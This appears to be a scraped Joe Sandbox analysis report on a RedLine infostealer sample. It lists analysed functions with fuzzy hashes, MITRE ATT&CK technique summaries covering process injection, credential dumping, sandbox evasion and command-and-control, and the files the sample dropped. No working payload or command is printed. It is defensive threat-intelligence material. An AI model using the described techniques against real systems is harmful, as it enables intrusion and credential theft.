Function 06AE0656 Relevance: .4, Instructions: 390COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.1969589860.0000000006AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6ae0000_wZWwzQVEakJvEU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0ab4835dba9975c5d1a3313c9ff0e3907a93c74c6773dde09e6398ae99b4dc62
Instruction ID: 2d5d7d03d28a387c7f8d76c0c2b7db3932174b7840f78d7968a0c876baf2ee29
Opcode Fuzzy Hash: 0ab4835dba9975c5d1a3313c9ff0e3907a93c74c6773dde09e6398ae99b4dc62
Instruction Fuzzy Hash: F1F18B70B002149FDB54EF68C844A6EBBF6FF85705F51854AE9029F3A2CBB5EC458B81

Function 06AE06CC Relevance: .4, Instructions: 356COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.1969589860.0000000006AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6ae0000_wZWwzQVEakJvEU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c5ec4c8508b9d614ce4ef0615723a06d2aa62bebc82e76164936b5aeb43e12c0
Instruction ID: bd11e532b67c501ad6b46dde6e1cdcfae32d20b6326bb793a553ebfadb8dad8d
Opcode Fuzzy Hash: c5ec4c8508b9d614ce4ef0615723a06d2aa62bebc82e76164936b5aeb43e12c0
Instruction Fuzzy Hash: 1CE18C70B002149FDB40EF68C945A6E7BF6FF85701F11854AE9028F3A2CBB5EC458B91

Function 06AE0000 Relevance: .3, Instructions: 349COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.1969589860.0000000006AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6ae0000_wZWwzQVEakJvEU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: de96f2ec4acddd6e46dd4e3165c019c6598d16de8f8779466a326b5d9cea7651
Instruction ID: f13645e11c8395da0b258388a56ba28ee6341fb550e4055001b07214291fda64
Opcode Fuzzy Hash: de96f2ec4acddd6e46dd4e3165c019c6598d16de8f8779466a326b5d9cea7651
Instruction Fuzzy Hash: C3D19D70B012449FDB41EF68C855A6E7BB6FF89700F15819AE9018F3A2CBB1EC55CB91

Function 06AE1530 Relevance: .3, Instructions: 334COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.1969589860.0000000006AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6ae0000_wZWwzQVEakJvEU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f078ae88cb4ebbfb710ef99f99b332e15f5afca123ad000ab9037b2f0769dd97
Instruction ID: a92be0a7ddd3c0f7f372b0f6a7dd199602d50e2c8df40c8e5e25b9fe05688c26
Opcode Fuzzy Hash: f078ae88cb4ebbfb710ef99f99b332e15f5afca123ad000ab9037b2f0769dd97
Instruction Fuzzy Hash: FDC13A35B00104AFCB45DF59C985D6DBBB2FF89700B618099FA069F762C772EC158B61

Function 06AE11A8 Relevance: .2, Instructions: 201COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.1969589860.0000000006AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6ae0000_wZWwzQVEakJvEU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 267e2933e9ad024537f6819f9bde58a5307a41d0f1cab5ae56cc6c03fa225030
Instruction ID: 0e82c20bea9e7982add0e2d5f764ede70866aa7f95d8e12c34a1bbf5f7eeafa9
Opcode Fuzzy Hash: 267e2933e9ad024537f6819f9bde58a5307a41d0f1cab5ae56cc6c03fa225030
Instruction Fuzzy Hash: 88511335B042258FCB94AFB9D8845BABBE6EFD6211B14857AD809CF211EB31CC45C7A1

Function 06AE338B Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.1969589860.0000000006AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6ae0000_wZWwzQVEakJvEU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b84667b39393211c2d27931c75be056607ba5bea10e12394a14d98becf28354a
Instruction ID: 7b22873af66a3c3b4a4e97966acf9ff5fb30b65c62981b5116558e0e01464d26
Opcode Fuzzy Hash: b84667b39393211c2d27931c75be056607ba5bea10e12394a14d98becf28354a
Instruction Fuzzy Hash: 09213D35B001059FCB54DF69C984EA9BBB2FF88714F1580A5FA099F361DA31EC05CB50

Function 0144D054 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.1951792414.000000000144D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0144D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_144d000_wZWwzQVEakJvEU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 28f3491678a67343279d1b56aa26b9ab8255d49ac3a335842e63c5d5fe9b6161
Instruction ID: 806409e933ec349a22ec9c5a94236f434b0a991b02bc452da4da5a97d3b5efe2
Opcode Fuzzy Hash: 28f3491678a67343279d1b56aa26b9ab8255d49ac3a335842e63c5d5fe9b6161
Instruction Fuzzy Hash: 7F21E5B1904240DFEB169F54D8C4B16BBA5FB98314F24C66AE9090B366C336D416CB61

Function 0145D2C4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.1951845249.000000000145D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0145D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_145d000_wZWwzQVEakJvEU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 952f03aa1ebfe694490a8bb4a78db1a240d3084bb1c4c646b91e56b15a5551c0
Instruction ID: 7d1b24a5a0d065e438b12e6fcdc2c9ebe646bf8f5b3ca3478457f5ad3a63c554
Opcode Fuzzy Hash: 952f03aa1ebfe694490a8bb4a78db1a240d3084bb1c4c646b91e56b15a5551c0
Instruction Fuzzy Hash: 18210771904200DFDB41DF58D984B26BB65FF84320F24C56ADC094B357C33AD446C6A1

Function 0145D474 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.1951845249.000000000145D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0145D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_145d000_wZWwzQVEakJvEU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3e88fc184ee123316215d770e68b2a935a07acfe1e3f733766bb8c61ac397c7
Instruction ID: 5cfaf6cc3af6d6649e549b23c04432dff2fbf20641c5630049529ae35eb07fe7
Opcode Fuzzy Hash: c3e88fc184ee123316215d770e68b2a935a07acfe1e3f733766bb8c61ac397c7
Instruction Fuzzy Hash: 9921D6719042049FDB45DF94C5C4B26BB65FF84318F24C96EDC0A4B363C336E446C662

Function 0144D04F Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.1951792414.000000000144D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0144D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_144d000_wZWwzQVEakJvEU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 85e589ff89d53fefa928555ed391731ad88d74b974b24a20ba51987b010bfd2c
Instruction ID: 63e781150808f9e4401f66c9783a6f293ce0ca6f162099df407e3215ffe9ac8a
Opcode Fuzzy Hash: 85e589ff89d53fefa928555ed391731ad88d74b974b24a20ba51987b010bfd2c
Instruction Fuzzy Hash: 4C21CD76904280DFDB06CF44D9C4B16BF72FB88314F24C2AADD490A667C33AD426CB91

Function 0145D46F Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.1951845249.000000000145D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0145D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_145d000_wZWwzQVEakJvEU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5bc96cb8dbab4a459d35c79ebbe5ba2a9dff6c5f08df11ade35b896c854f64ae
Instruction ID: 327c16c1a0ab55f7d2436928d29148346c8a9eb36e974dcb378fe431c1c9c866
Opcode Fuzzy Hash: 5bc96cb8dbab4a459d35c79ebbe5ba2a9dff6c5f08df11ade35b896c854f64ae
Instruction Fuzzy Hash: 36118E75904244DFDB06CF54D5C4B16BB71FB88218F24C6AADC494B767C33AD44ACB52

Function 0145D2BF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.1951845249.000000000145D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0145D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_145d000_wZWwzQVEakJvEU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 118f051af2fa4d3b71157da4c1d703aecab942a5cdb4903c1e78cbe3821e71d1
Instruction ID: d7c95f07c15891e5ea3001c602e4ffe42c61db233066e0c80689538346bcb3fe
Opcode Fuzzy Hash: 118f051af2fa4d3b71157da4c1d703aecab942a5cdb4903c1e78cbe3821e71d1
Instruction Fuzzy Hash: C4119076904280CFDB12CF14D5C4B1ABB61FB84224F24C6AADC494B757C33AD44ACBA1

Function 0144DAE5 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.1951792414.000000000144D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0144D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_144d000_wZWwzQVEakJvEU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 449ca4bc61aee58847bdf01132ffcb2a5fb4bdaa8b47b288c6b46f7f2e71354c
Instruction ID: f334ee2512b69694f635e7c7e4be5135a4d9d9120b90b08331f64571111278ab
Opcode Fuzzy Hash: 449ca4bc61aee58847bdf01132ffcb2a5fb4bdaa8b47b288c6b46f7f2e71354c
Instruction Fuzzy Hash: FC01F7314083849BF7109E99CCC8B27FFD8DF65325F08C41BED090A296C6389841C671

Function 0144DAE4 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.1951792414.000000000144D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0144D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_144d000_wZWwzQVEakJvEU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fe492d6d7fdbabfa77492ce06801de2054ee9dac243b36efc6a51c9a3e5639c3
Instruction ID: c9faee73f3e4c3936926ceca3832ed8594853f907ddb8936e8308b24740f2ec0
Opcode Fuzzy Hash: fe492d6d7fdbabfa77492ce06801de2054ee9dac243b36efc6a51c9a3e5639c3
Instruction Fuzzy Hash: 5CF06271404384AAF7118E5ACC88B67FFD8EB95639F18C45AED084B296C2799844CA71

Non-executed Functions

Function 06AE0D50 Relevance: 10.3, Strings: 8, Instructions: 299COMMON

Download Yara Rule

Strings

$^q, xrefs: 06AE0F00
$^q, xrefs: 06AE0E1C
$^q, xrefs: 06AE0F76
$^q, xrefs: 06AE0E4E
$^q, xrefs: 06AE0E42
$^q, xrefs: 06AE0F50
$^q, xrefs: 06AE0DCC
$^q, xrefs: 06AE0F82

Memory Dump Source

Source File: 0000000E.00000002.1969589860.0000000006AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6ae0000_wZWwzQVEakJvEU.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
API String ID: 0-3823777903
Opcode ID: 0196c7eba9ef96c6b2c4ee654becf24c3c94baf8b6b5d9208e2968701faf6534
Instruction ID: e15060a2d82809c9b8978bb74d0b6c9beaeaade57044740226c72de4daeeb570
Opcode Fuzzy Hash: 0196c7eba9ef96c6b2c4ee654becf24c3c94baf8b6b5d9208e2968701faf6534
Instruction Fuzzy Hash: 2EB1D130B006458FDB59EB69C854A7EBBF6BF89310F14846AE406DB3A1CB75DC61CB90

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report nzLoHpgAln.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: RedLine

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Persistence and Installation Behavior

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\nzLoHpgAln.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\wZWwzQVEakJvEU.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_14bvgc3h.be3.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_g5x2tccv.10n.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ijnwrple.mpo.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ka30tgcr.lyn.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nrljpeyj.aiy.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xkbw5r5b.aav.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zcazmfrm.d3r.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zmnsgog5.vw0.psm1

Windows Analysis Report
nzLoHpgAln.exe